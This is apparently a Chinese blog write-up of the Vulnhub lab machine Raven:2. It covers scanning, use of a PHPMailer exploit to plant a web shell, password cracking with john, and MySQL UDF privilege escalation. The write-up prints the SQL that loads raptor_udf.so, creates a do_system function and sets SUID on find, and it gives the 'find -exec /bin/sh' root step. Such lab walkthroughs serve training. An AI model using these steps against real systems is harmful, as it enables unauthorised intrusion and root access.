mysql靶机_[Vulnhub]靶机渗透-Raven:2

0x01 Scan Host

3f7833465794a4d794496309acebb2c4.png

d2416aa4694353584c279da169a07018.png

更加详细地扫描:

a871e64c4d6dddcc0941a4ad79512308.png

0x02 Web Service

还是有个wp,老规矩用wpscan看一下,同时扫描目录。

flag1

dirb扫描出错,所以这里用gobuster:

2d6b41efd4b3aed47d468ee253937660.png

挨个看了下发现了flag1:

33e915555d2b43503a3e940aaa03886e.png

刚好wpscan的结果也出来了,wordpress的版本是4.8.7,主题twentyseven 2.2,大概看了没有什么可利用的洞。

4785f9ec69fea34103c304cd5f4e7cc1.png

再仔细看一下当时扫出的目录,发现有PHPMailer,VERSION:

d1a0e6797499457a9d99389adb54323e.png

看一下有没有Nday:

1c8c0e724e72ae8ff25ac6121da5a0d6.png

选择了40974.py这个POC,做了修改:

8fa3bb99056270f3a39f6f36f4463297.png

首先payload改成了一句话木马,然后target注意contact.php是目标发送email的页面,也是PHPMailer存在漏洞的地方,再一个就是注意第三个框的路径.访问contact.php生成shell:

20b9791bd4d717ba2ed3d9fb308bcda8.png

然后wordpress的后台密码爆破失败。

0x03 SSH Service

使用hydra爆破没出,包括常规字典以及社会工程学字典。

0x04 Privilege Escalation

Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

fdc5d01bd017dc779fdb6e58ca79eed6.png

没看到SUID以及sudo可以利用的东西。

flag2&&flag3

fcf595a1f07dbb504882ebe0dbf5e540.png

还少个flag2,刚才命令查找的目录路径不全面:

find / -name "flag*"

f72e5c7b4d9b65d75fc918dd0c18f1bb.png

现在提权没有头绪,想想还有mysql没有看,看到wp的配置文件是root:

2abbae99ee9e184baa4ce9fd1c3cf22e.png

AntSword导出是csv,所以我们自己导出:

c4c36d5672b99801ec632df5441bbcf9.png

导出后修改为user:pass的格式,然后用john跑一下HASH,还是用rockyou字典。

9e1142c294fbed96b78632e3469f11ce.png

Steven的密码是跑出来了,但是没能成功登陆SSH.

mysql-CVE-2016-6662

这样就很头疼了,最后还剩mysql:

b1d25e7cf043c0f956086fcaf8d79eaf.png

5273edb8a482bdf04b62aff175d9ce56.png

注意…我不小心是mv出来的,尽量cp吧,然后编译一下再编译成动态链接库。

use mysql;

create table foo(line blob);

insert into foo values(load_file('/var/www/html/raptor_udf.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';

create function do_system returns integer soname 'raptor_udf.so';

select * from mysql.func;

select do_system('chmod u+s /usr/bin/find');

其实就是利用这个动态链接库来创建一个自定义函数来执行命令,给find SUID权限,然后利用find提权:

find / -exec "/bin/sh" \;

flag4

但是我这里没交互式shell,用msf直接整个payload丢上去反弹也行,用我之前说过的nc没有-e参数的方法也行。我嫌麻烦就不弄了:

15ba277879509d034ba41f74237b3f4b.png

直接读flag吧,但是建议各位还是走完提权的流程最好。

6b17cbd7d7a17ed2b4675c5b7bceec42.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值